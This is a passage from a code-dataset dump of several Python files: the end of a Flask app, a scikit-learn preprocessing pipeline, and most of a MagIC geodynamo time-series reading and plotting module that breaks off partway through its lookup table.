\"__main__\":\r\n app.run(\"0.0.0.0\", 80)","repo_name":"pak-app/docker-flask-redis","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15192033829","text":"import sys\nimport os\n\nfrom dataclasses import dataclass\nfrom src.exception import CustomException\nfrom src.logger import logging\nfrom src import utils\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import OneHotEncoder, StandardScaler\n\n\n@dataclass\nclass DataTransformationConfig:\n preprocessor_obj_file_path = os.path.join('artifacts', 'preprocessor.pkl')\n\nclass DataTransformation:\n\n def __init__(self):\n self.data_transformation_config = DataTransformationConfig()\n\n def get_data_transformer_object(self):\n try:\n numerical_columns = ['writing_score', 'reading_score']\n categorical_columns = [\n 'gender',\n 'race_ethnicity',\n 'parental_level_of_education',\n 'lunch',\n 'test_preparation_course'\n ]\n\n num_pipeline = Pipeline(\n steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())\n ]\n )\n\n cat_pipeline = Pipeline(\n steps = [\n ('imputer', SimpleImputer(strategy=\"most_frequent\")),\n ('one_hot_encoder', OneHotEncoder()),\n ('scaler', StandardScaler(with_mean=False))\n ]\n )\n\n # logging.info(\"Categorical columns: \",categorical_columns)\n # logging.info(\"Numerical columns: \", numerical_columns)\n preprocessor = ColumnTransformer(\n [\n ('numerical_pipeline', num_pipeline, numerical_columns),\n ('categorical_pipeline', cat_pipeline, categorical_columns)\n ]\n )\n return preprocessor\n\n except Exception as e:\n raise CustomException(e, sys)\n\n def initiate_data_transformation(self, train_path, test_path):\n\n try:\n train_dataframe = pd.read_csv(train_path)\n test_dataframe = pd.read_csv(test_path)\n logging.info(\"Train and test data import complete.\")\n\n preprocessor_object = self.get_data_transformer_object()\n logging.info(\"Fetching preprocessor object\")\n\n target_column_name = 'math_score'\n\n logging.info(\"Seperating input and output features from train and test dataframe\")\n input_train_dataframe = train_dataframe.drop(columns=[target_column_name], axis=1)\n target_train_dataframe= train_dataframe[target_column_name]\n\n input_test_dataframe = test_dataframe.drop(columns=[target_column_name], axis=1)\n target_test_dataframe= test_dataframe[target_column_name]\n\n print(\"preprocessor_object\",preprocessor_object)\n\n # Output of this transformed result will be a numpy array\n input_train_transformed_dataframe = preprocessor_object.fit_transform(input_train_dataframe)\n input_test_transformed_dataframe = preprocessor_object.transform(input_test_dataframe)\n\n # print(\"test check 1: \",input_test_transformed_dataframe.shape)\n # n1 = np.array(target_test_dataframe).reshape((200,1))\n # print(\"train check 2: \", n1.shape)\n\n # Concatenating independent and dependent features in train dataframe\n # 1st way\n train_array = np.concatenate((input_train_transformed_dataframe, np.array(target_train_dataframe).reshape((800,1))), axis=1)\n # # 2nd way\n # train_array = np.c_[input_train_transformed_dataframe, np.array(target_train_dataframe)]\n\n # 1st way\n test_array = np.concatenate((input_test_transformed_dataframe, np.array(target_test_dataframe).reshape((200,1))), axis=1)\n # # 2nd way\n # test_array = np.c_[input_test_transformed_dataframe, np.array(target_test_dataframe)]\n\n logging.info(\"Saving the pipeline(preprocessor) as pickle file\")\n utils.save_pipeline_object( path = self.data_transformation_config.preprocessor_obj_file_path, object=preprocessor_object )\n\n # Returning training array, test array and pipeline pickle file path\n return (train_array, test_array, self.data_transformation_config.preprocessor_obj_file_path)\n\n except Exception as e:\n raise CustomException(e, sys)","repo_name":"tarunrockr/ml_project","sub_path":"src/components/data_transformation.py","file_name":"data_transformation.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"451826526","text":"#-*- coding: utf-8 -*-\nimport os\nimport re\nimport copy\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom .log import MagicSetup\nimport glob\nfrom .libmagic import fast_read, scanDir\n\n\nclass MagicTs(MagicSetup):\n \"\"\"\n This python class is used to read and plot the different time series\n written by the code:\n\n * Kinetic energy: :ref:`e_kin.TAG `\n * Magnetic energy of the outer core: :ref:`e_mag_oc.TAG `\n * Magnetic energy of the inner core: :ref:`e_mag_ic.TAG `\n * Dipole information: :ref:`dipole.TAG `\n * Rotation: :ref:`rot.TAG `\n * Diagnostic parameters: :ref:`par.TAG `\n * Geostrophy: :ref:`geos.TAG `\n * Taylorization measures: :ref:`Tay.TAG `\n * Heat transfer: :ref:`heat.TAG `\n * Helicity: :ref:`helicity.TAG `\n * Velocity square: :ref:`u_square.TAG `\n * Angular momentum: :ref:`AM.TAG `\n * Power budget: :ref:`power.TAG `\n * Earth-likeness of the CMB field: :ref:`earth_like.TAG `\n * Parallel and perpendicular decomposition: :ref:`perpPar.TAG `\n * Phase field: :ref:`phase.TAG `\n * Hemisphericity: :ref:`hemi.TAG `\n * RMS force balance: :ref:`dtVrms.TAG `\n * RMS induction terms: :ref:`dtBrms.TAG `\n * Time-evolution of m-spectra: :ref:`am_[kin|mag]_[pol|tor].TAG `\n\n Here are a couple of examples of how to use this function.\n\n >>> # plot the most recent e_kin.TAG file found in the directoy\n >>> MagicTs(field='e_kin')\n >>>\n >>> # stack **all** the power.TAG file found in the directory\n >>> ts = MagicTs(field='power', all=True)\n >>> print(ts.time, ts.buoPower) # print time and buoyancy power\n >>>\n >>> # If you only want to read the file ``heat.N0m2z``\n >>> ts = MagicTs(field='heat', tag='N0m2z', iplot=False)\n \"\"\"\n\n def __init__(self, datadir='.', field='e_kin', iplot=True, all=False, tag=None):\n \"\"\"\n :param datadir: working directory\n :type datadir: str\n :param field: the file you want to plot\n :type field: str\n :param iplot: when set to True, display the plots (default True)\n :type iplot: bool\n :param all: when set to True, the complete time series is reconstructed by\n stacking all the corresponding files from the working directory\n (default False)\n :type all: bool\n :param tag: read the time series that exactly corresponds to the specified tag\n :type tag: str\n \"\"\"\n self.field = field\n pattern = os.path.join(datadir, 'log.*')\n logFiles = scanDir(pattern)\n\n if self.field in ('am_mag_pol','am_mag_tor','am_kin_pol','am_kin_tor'):\n binary = True\n else:\n binary = False\n\n if tag is not None:\n pattern = os.path.join(datadir, '{}.{}'.format(self.field, tag))\n files = scanDir(pattern)\n\n # Either the log.tag directly exists and the setup is easy to obtain\n if os.path.exists(os.path.join(datadir, 'log.{}'.format(tag))):\n MagicSetup.__init__(self, datadir=datadir, quiet=True,\n nml='log.{}'.format(tag))\n # Or the tag is a bit more complicated and we need to find\n # the corresponding log file\n else:\n st = os.path.join(datadir, '{}\\.(.*)'.format(self.field))\n mask = re.compile(st)\n if mask.match(files[-1]):\n ending = mask.search(files[-1]).groups(0)[0]\n pattern = os.path.join(datadir, 'log.{}'.format(ending))\n if logFiles.__contains__(pattern):\n MagicSetup.__init__(self, datadir=datadir, quiet=True,\n nml='log.{}'.format(ending))\n\n # Concatenate the files that correspond to the tag\n for k, file in enumerate(files):\n filename = file\n data = fast_read(filename, binary=binary)\n if k == 0:\n tslut = TsLookUpTable(data, self.field)\n else:\n tslut += TsLookUpTable(data, self.field)\n\n # If no tag is specified, the most recent is plotted\n elif not all:\n if len(logFiles) != 0:\n MagicSetup.__init__(self, quiet=True, nml=logFiles[-1])\n name = '{}.{}'.format(self.field, self.tag)\n filename = os.path.join(datadir, name)\n data = fast_read(filename, binary=binary)\n else:\n mot = '{}.*'.format(self.field)\n dat = [(os.stat(i).st_mtime, i) for i in glob.glob(mot)]\n dat.sort()\n filename = dat[-1][1]\n data = fast_read(filename, binary=binary)\n tslut = TsLookUpTable(data, self.field)\n\n # If no tag is specified but all=True, all the directory is plotted\n else:\n if len(logFiles) != 0:\n MagicSetup.__init__(self, quiet=True, nml=logFiles[-1])\n pattern = os.path.join(datadir, '{}.*'.format(self.field))\n files = scanDir(pattern)\n for k, file in enumerate(files):\n filename = file\n data = fast_read(filename, binary=binary)\n if len(data) > 0: # File is not empty\n if k == 0:\n tslut = TsLookUpTable(data, self.field)\n else:\n tslut += TsLookUpTable(data, self.field)\n\n try:\n # Copy look-up table arguments into MagicTs object\n for attr in tslut.__dict__:\n setattr(self, attr, tslut.__dict__[attr])\n\n if iplot:\n self.plot()\n except NameError: # In case tslut in not Defined\n print('No file correponding to field \"{}\" has been found'.format(self.field))\n\n def plot(self):\n \"\"\"\n Plotting subroutines. Only called if 'iplot=True'\n \"\"\"\n if self.field == 'e_kin':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.ekin_pol, ls='-', c='C0', label='ekin pol')\n ax.plot(self.time, self.ekin_tor, ls='-', c='C1', label='ekin tor')\n ax.plot(self.time, self.ekin_pol_axi, ls='--', c='C0',\n label='ekin pol axi')\n ax.plot(self.time, self.ekin_tor_axi, ls='--', c='C1',\n label='ekin tor axi')\n ax.plot(self.time, self.ekin_tot, ls='-', c='0.25', label='ekin tot')\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Ekin')\n ax.set_yscale('log')\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n elif self.field == 'e_mag_oc':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.emagoc_pol, ls='-', c='C0', label='emag pol')\n ax.plot(self.time, self.emagoc_tor, ls='-', c='C1', label='emag tor')\n ax.plot(self.time, self.emagoc_pol_axi, ls='--', c='C0',\n label='emag pol axi')\n ax.plot(self.time, self.emagoc_tor_axi, ls='--', c='C1',\n label='emag tor axi')\n ax.plot(self.time, self.emag_tot, ls='-', c='0.25', label='emag tot')\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Emag')\n ax.set_yscale('log')\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n\n # fig,ax = plt.subplots(1)\n # ax.plot(self.time, self.emag_es, ls='-',\n # label=r'${E_B}^S$')\n # ax.plot(self.time, self.emag_eas, ls='-',\n # label=r'${E_B}^A$')\n # ax.legend(loc='best', frameon=False)\n # ax.set_xlabel('Time')\n # ax.set_ylabel('Emag')\n\n elif self.field == 'e_mag_ic':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.emagic_pol, ls='-', c='C0', label='emagic pol')\n ax.plot(self.time, self.emagic_tor, ls='-', c='C1', label='emagic tor')\n ax.plot(self.time, self.emagic_pol_axi, ls='--', c='C0',\n label='emagic pol axi')\n ax.plot(self.time, self.emagic_tor_axi, ls='--', c='C1',\n label='emagic tor axi')\n ax.plot(self.time, self.emagic_pol+self.emagic_tor, ls='-', c='0.25',\n label='emagic tot')\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Emag inner core')\n ax.set_yscale('log')\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n elif self.field == 'rot':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.omega_ic, ls='-', label='Omega IC')\n ax.set_xlabel('Time')\n ax.set_ylabel('Rotation inner core')\n ax.legend(loc='best', frameon=False)\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n \n fig1 = plt.figure()\n ax1 = fig1.add_subplot(111)\n ax1.plot(self.time, self.lorentz_torque_ic, ls='-', c='C0',\n label='Lorentz torque on IC')\n ax1.plot(self.time,self.viscous_torque_ic, ls='-', c='C1',\n label='Viscous torque on IC')\n ax1.legend(loc='best', frameon=False)\n ax1.set_xlabel('Time')\n ax1.set_ylabel('Torque on IC')\n ax1.set_xlim(self.time[0], self.time[-1])\n ax1.ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n ax1.axhline(0., color='0.5', ls='--', lw=1)\n fig1.tight_layout()\n elif self.field == 'timestep':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.step(self.time, self.dt)\n ax.set_yscale('log')\n ax.set_xlabel('Time')\n ax.set_ylabel('Time step size')\n fig.tight_layout()\n elif self.field == 'dipole':\n if self.ktopb != 2:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.theta_dip, label='theta_dip')\n #ax.plot(self.time, self.phi_dip, 'r-', label='phi_dip')\n ax.set_ylabel('Dipole angle')\n ax.set_xlabel('Time')\n ax.set_ylim(-1., 181)\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.dipTot, label='Total dipolarity')\n ax.plot(self.time, self.dipolarity, ls='--', label='Axisym dipolarity')\n ax.plot(self.time, self.dipTot_cmb, ls='-', c='C2',\n label='Total dipolarity CMB')\n ax.plot(self.time, self.dip_cmb, ls='--', c='C2',\n label='Axisym dipolarity')\n if hasattr(self, 'l_geo'):\n lcut = self.l_geo\n else:\n lcut = 11\n ax.plot(self.time, self.dip_l11, ls='-', c='C3',\n label='Axisym dip l={:d}'.format(lcut))\n ax.plot(self.time, self.dipTot_l11, ls='--', c='C3',\n label='Total dip l={:d}'.format(lcut))\n # ax.plot(self.time, self.dip3, ls='-', c='#e5ae38',\n # label='Epol axi/Ecmb')\n ax.legend(loc='best', frameon=False)\n ax.set_ylabel('Dipolarity')\n ax.set_xlabel('Time')\n ax.set_ylim(0, 1)\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n elif self.field == 'AM':\n fig = plt.figure()\n ax = fig.add_subplot(211)\n ax.plot(self.time, self.am_oc_z, label='Outer core')\n ax.plot(self.time, self.am_ic, label='Inner core')\n ax.plot(self.time, self.amz, ls='-', c='0.25', label='Total')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False)\n ax.set_ylabel('AM')\n ax = fig.add_subplot(212)\n ax.semilogy(self.time[1:], np.abs(self.damzdt[1:]))\n ax.set_xlabel('Time')\n ax.set_ylabel('dAmz / dt')\n ax.set_xlim(self.time[1], self.time[-1])\n fig.tight_layout()\n elif self.field == 'par':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if self.mode == 1 or self.prmag == 0.:\n ax.semilogy(self.time, self.rm, label='Reynolds')\n else:\n ax.semilogy(self.time, self.rm, label='Magnetic Reynolds')\n if self.elsasser.max() > 0.:\n ax.semilogy(self.time, self.elsasser, label='Elsasser')\n ax.semilogy(self.time, self.els_cmb, label='Elsasser CMB')\n ax.semilogy(self.time, self.rossby_l, label='Rossby l')\n if hasattr(self, 'rolc'):\n ax.semilogy(self.time, self.rolc, label='Roc l')\n ax.legend(loc='lower right', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Params')\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.semilogy(self.time, self.dlV, label='Integral (ell)')\n ax.semilogy(self.time, self.dlVc, label='Integral (ell c)')\n ax.semilogy(self.time, self.dmV, label='Integral (m)')\n ax.semilogy(self.time, self.dlPolPeak, label='Peak (pol)')\n if abs(self.lbDiss).max() > 0.:\n ax.semilogy(self.time, self.lbDiss, label='Magnetic dissipation')\n if abs(self.lvDiss).max() > 0.:\n ax.semilogy(self.time, self.lvDiss, label='Viscous dissipation')\n ax.set_xlabel('Time')\n ax.set_ylabel('Lengthscales')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False)\n fig.tight_layout()\n\n if self.dipolarity.max() > 0.:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.dipolarity, label='Dipolarity')\n ax.plot(self.time, self.dip_cmb, label='Dipolarity CMB')\n ax.legend(loc='upper right', frameon=False)\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_xlabel('Time')\n ax.set_ylabel('Dipolarity')\n ax.set_ylim(0, 1)\n fig.tight_layout()\n elif self.field == 'geos':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.geos, label='Total')\n ax.plot(self.time, self.geosM, label='Meridional')\n ax.plot(self.time, self.geosZ, label='Zonal')\n ax.plot(self.time, self.geosNAP, label='Non-axi perp')\n ax.set_xlabel('Time')\n ax.set_ylabel('Geostrophy')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False)\n fig.tight_layout()\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.corr_vz_otc, label='uz')\n ax.plot(self.time, self.corr_vortz_otc, label='z vorticity')\n ax.plot(self.time, self.corr_hel_otc, label='Helicity')\n ax.set_xlabel('Time')\n ax.set_ylabel('z correlations')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False)\n fig.tight_layout()\n elif self.field == 'phase':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax1 = ax.twinx()\n ax.plot(self.time, self.rmelt, label='r melt', color='C0')\n ax1.plot(self.time, self.trmelt, label='T(r melt)', color='C1')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_xlabel('Time')\n ax.set_ylabel('r melt')\n ax1.set_ylabel('T(r melt)')\n fig.tight_layout()\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.semilogy(self.time, self.ekinS/self.ekinL)\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_xlabel('Time')\n ax.set_ylabel('Relative energy fraction in solidus')\n fig.tight_layout()\n elif self.field == 'hemi':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.hemi_emag, label='Emag')\n ax.plot(self.time, self.hemi_br, label='|Br| volume')\n ax.plot(self.time, self.hemi_cmb, label='|Br| CMB')\n ax.set_xlabel('Time')\n ax.set_ylabel('Hemisphericity')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_ylim(0., 1.)\n #ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False)\n fig.tight_layout()\n elif self.field == 'earth_like':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.axial_dipole, label='AD/NAD')\n ax.plot(self.time, self.symmetry, label='O/E')\n ax.plot(self.time, self.zonality, label='Z/NZ')\n ax.plot(self.time, self.flux_concentration, label='FCF')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_xlabel('Time')\n ax.set_ylabel('Rating parameters')\n ax.legend(loc='upper right', frameon=False)\n fig.tight_layout()\n\n fig1 = plt.figure()\n ax1 = fig1.add_subplot(111)\n ax1.plot(self.time, self.chi_square)\n ax1.set_xlim(self.time[0], self.time[-1])\n ax1.set_xlabel('Time')\n ax1.set_ylabel('Chi square')\n fig1.tight_layout()\n elif self.field == 'misc':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.topnuss, label='Top Nusselt')\n ax.plot(self.time, self.botnuss, label='Bottom Nusselt')\n ax.legend(loc='lower right', frameon=False)\n\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_xlabel('Time')\n ax.set_ylabel('Nusselt number')\n fig.tight_layout()\n if self.helrms.max() != 0.:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.helrms)\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_xlabel('Time')\n ax.set_ylabel('Helicity')\n fig.tight_layout()\n elif self.field == 'heat':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if self.kbots == 2 and self.ktops == 2:\n ax.plot(self.time, self.deltaTnuss, label=r'$Nu_{\\Delta T}$')\n else:\n ax.plot(self.time, self.topnuss, label='Top Nusselt')\n ax.plot(self.time, self.botnuss, label='Bottom Nusselt')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='lower right', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Nusselt number')\n fig.tight_layout()\n\n if self.topsherwood.max() != 1.0 or self.deltasherwood.max() != 1.0:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if self.kbotxi == 2 and self.ktopxi == 2:\n ax.plot(self.time, self.deltasherwood, label=r'$Sh_{\\Delta \\xi}$')\n else:\n ax.plot(self.time, self.topsherwood, label='Top Sherwood')\n ax.plot(self.time, self.botsherwood, label='Bottom Sherwood')\n ax.legend(loc='lower right', frameon=False)\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_xlabel('Time')\n ax.set_ylabel('Sherwood number')\n fig.tight_layout()\n elif self.field == 'helicity':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.helRMSN, label='Northern Hemisphere')\n ax.plot(self.time, self.helRMSS, label='Southern Hemisphere')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='lower right', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Helicity')\n fig.tight_layout()\n elif self.field == 'u_square':\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.ekin_pol, ls='-', c='C0', label='ekin pol')\n ax.plot(self.time, self.ekin_tor, ls='-', c='C1', label='ekin tor')\n ax.plot(self.time, self.ekin_pol_axi, ls='--', c='C0',\n label='ekin pol axi')\n ax.plot(self.time, self.ekin_tor_axi, ls='--', c='C1',\n label='ekin tor axi')\n ax.plot(self.time, self.ekin_tot, ls='-', c='0.25', label='ekin tot')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('u**2')\n ax.set_yscale('log')\n fig.tight_layout()\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if self.mode == 1 or self.prmag == 0.:\n ax.semilogy(self.time, self.rm, label='Reynolds')\n else:\n ax.semilogy(self.time, self.rm, label='Magnetic Reynolds')\n ax.semilogy(self.time, self.ro, label='Rossby')\n ax.semilogy(self.time, self.rossby_l, label='Rossby l')\n ax.semilogy(self.time, self.dl, label='l')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='lower right', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Params')\n fig.tight_layout()\n elif self.field in ('dtVrms'):\n fig = plt.figure() # Poloidal forces\n ax = fig.add_subplot(111)\n ax.semilogy(self.time, self.CorRms, label='Coriolis')\n ax.semilogy(self.time, self.PreRms, label='Pressure')\n ax.semilogy(self.time, self.LFRms, label='Lorentz')\n ax.semilogy(self.time, self.BuoRms, label='Thermal Buoyancy')\n if abs(self.ChemRms).max() > 0:\n ax.semilogy(self.time, self.ChemRms, label='Chemical Buoyancy')\n ax.semilogy(self.time, self.InerRms, label='Inertia')\n ax.semilogy(self.time, self.DifRms, label='Diffusion')\n\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False, ncol=2)\n ax.set_xlabel('Time')\n ax.set_ylabel('RMS forces')\n fig.tight_layout()\n\n fig = plt.figure() # Toroidal forces\n ax = fig.add_subplot(111)\n ax.semilogy(self.time, self.geos, label='Geostrophic balance')\n ax.semilogy(self.time, self.mageos, label='Magnetostrophic')\n ax.semilogy(self.time, self.arc, label='Archimedean')\n ax.semilogy(self.time, self.arcMag, label='Archimedean+Lorentz')\n ax.semilogy(self.time, self.corLor, label='Coriolis/Lorentz')\n ax.semilogy(self.time, self.preLor, label='Pressure/Lorentz')\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('RMS balances')\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n elif self.field == 'perpPar':\n fig = plt.figure()\n ax= fig.add_subplot(111)\n ax.plot(self.time, self.eperp, ls='-', c='C0', label='ekin perp')\n ax.plot(self.time, self.epar, ls='-', c='C1', label='ekin par')\n ax.plot(self.time, self.eperp_axi, ls='--', c='C0',\n label='ekin perp axi')\n ax.plot(self.time, self.epar_axi, ls='--', c='C1',\n label='ekin par axi')\n ax.plot(self.time, self.ekin_tot, ls='-', c='0.25', label='ekin tot')\n ax.plot(self.time, self.ekin_tot, 'k-')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_yscale('log')\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Kinetic energy')\n\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n elif self.field in ('power'):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if self.buoPower.max() != 0.:\n ax.semilogy(self.time, self.buoPower, label='Thermal buoyancy')\n if self.buoPower_chem.max() != 0.:\n ax.semilogy(self.time, self.buoPower_chem,\n label='Chemical buoyancy')\n if self.ohmDiss.max() != 0.:\n ax.semilogy(self.time, -self.ohmDiss, label='Ohmic diss.')\n ax.semilogy(self.time, -self.viscDiss, label='Viscous diss.')\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Power')\n fig.tight_layout()\n\n if hasattr(self,'fohm'):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(self.time, self.fohm)\n ax.set_xlim(self.time[0], self.time[-1])\n ax.set_ylim(0., 1.)\n ax.set_xlabel('Time')\n ax.set_ylabel('fohm')\n fig.tight_layout()\n elif self.field in ('dtBrms'):\n fig = plt.figure() # Poloidal\n ax = fig.add_subplot(111)\n ax.semilogy(self.time, self.DynPolRms, label='Induction')\n ax.semilogy(self.time, self.DifPolRms, label='Diffusion')\n ax.semilogy(self.time, self.dtBpolRms, label='Time derivative')\n\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Poloidal field production')\n fig.tight_layout()\n\n fig = plt.figure() # Toroidal\n ax = fig.add_subplot(111)\n ax.semilogy(self.time, self.DynTorRms, label='Induction')\n ax.semilogy(self.time, self.DifTorRms, label='Diffusion')\n ax.semilogy(self.time, self.omEffect*self.DynTorRms,\n label='Omega effect')\n ax.semilogy(self.time, self.dtBtorRms, label='Time derivative', )\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Toroidal field production')\n fig.tight_layout()\n elif self.field in ('SRIC'):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.semilogy(self.time, self.viscTorq, label='Viscous')\n ax.semilogy(self.time, self.LorTorq, label='Lorentz')\n ax.semilogy(self.time, self.totTorq, label='Total')\n\n ax.set_xlim(self.time[0], self.time[-1])\n ax.legend(loc='best', frameon=False)\n ax.set_xlabel('Time')\n ax.set_ylabel('Torque')\n fig.tight_layout()\n elif self.field in ('am_mag_pol', 'am_mag_tor', 'am_kin_pol', 'am_kin_tor'):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n for k in range(self.coeffs.shape[1]):\n ax.semilogy(self.time, self.coeffs[:, k], label='m={}'.format(k))\n ax.set_xlabel('Time')\n if self.coeffs.shape[1] < 20:\n ax.legend(loc='best', frameon=False)\n if self.field == 'am_mag_pol':\n ax.set_ylabel('Emag poloidal')\n elif self.field == 'am_mag_tor':\n ax.set_ylabel('Emag toroidal')\n elif self.field == 'am_kin_pol':\n ax.set_ylabel('Ekin poloidal')\n elif self.field == 'am_kin_tor':\n ax.set_ylabel('Ekin toroidal')\n ax.set_xlim(self.time[0], self.time[-1])\n fig.tight_layout()\n\n\nclass TsLookUpTable:\n \"\"\"\n The purpose of this class is to create a lookup table between the numpy\n array that comes from the reading of the time series and the corresponding\n column.\n \"\"\"\n\n def __init__(self, data, field):\n \"\"\"\n :param data: numpy array that contains the data\n :type data: numpy.ndarray\n :param field: name of the field (i.e. 'eKinR', 'eMagR', 'powerR', ...)\n :type field: str\n \"\"\"\n\n self.field = field\n\n if self.field == 'e_kin':\n self.time = data[:, 0]\n self.ekin_pol = data[:, 1]\n self.ekin_tor = data[:, 2]\n self.ekin_pol_axi = data[:, 3]\n self.ekin_tor_axi = data[:, 4]\n self.ekin_pol_es = data[:, 5]\n self.ekin_tor_es = data[:, 6]\n self.ekin_pol_es_axi = data[:, 7]\n self.ekin_tor_es_axi = data[:, 8]\n self.ekin_tot = self.ekin_pol + self.ekin_tor\n self.ekin_axi = self.ekin_pol_axi + self.ekin_tor_axi\n self.ekin_es = self.ekin_pol_es + self.ekin_tor_es\n self.ekin_es_axi = self.ekin_pol_es_axi + self.ekin_tor_es_axi\n self.ekin_pol_naxi = self.ekin_pol-self.ekin_pol_axi\n self.ekin_tor_naxi = self.ekin_tor-self.ekin_tor_axi\n self.ekin_es_naxi = self.ekin_es-self.ekin_es_axi\n self.ekin_naxi = self.ekin_tot-self.ekin_pol_axi-self.ekin_tor_axi\n elif self.field == 'e_mag_oc':\n self.time = data[:, 0]\n self.emagoc_pol = data[:, 1]\n self.emagoc_tor = data[:, 2]\n self.emagoc_pol_axi = data[:, 3]\n self.emagoc_tor_axi = data[:, 4]\n self.ext_nrj_pol = data[:, 5]\n self.ext_nrj_pol_axi = data[:, 6]\n self.emagoc_pol_eas = data[:, 7]\n self.emagoc_tor_eas = data[:, 8]\n self.emagoc_pol_eas_axi = data[:, 9]\n self.emagoc_tor_eas_axi = data[:, 10]\n self.emag_tot = self.emagoc_pol + self.emagoc_tor\n self.emag_axi = self.emagoc_pol_axi + self.emagoc_tor_axi\n self.emag_eas = self.emagoc_pol_eas + self.emagoc_tor_eas\n self.emag_eas_axi = self.emagoc_pol_eas_axi + self.emagoc_tor_eas_axi\n elif self.field == 'e_mag_ic':\n self.time = data[:, 0]\n self.emagic_pol = data[:, 1]\n self.emagic_tor = data[:, 2]\n self.emagic_pol_axi = data[:, 3]\n self.emagic_tor_axi = data[:, 4]\n self.emagic_tot = self.emagic_pol + self.emagic_tor\n elif self.field == 'timestep':\n self.time = data[:, 0]\n self.dt = data[:, 1]\n elif self.field == 'dipole':\n self.time = data[:, 0]\n self.theta_dip = data[:, 1]\n self.phi_dip = data[:, 2]\n self.dipolarity = data[:, 3]\n self.dip_cmb = data[:, 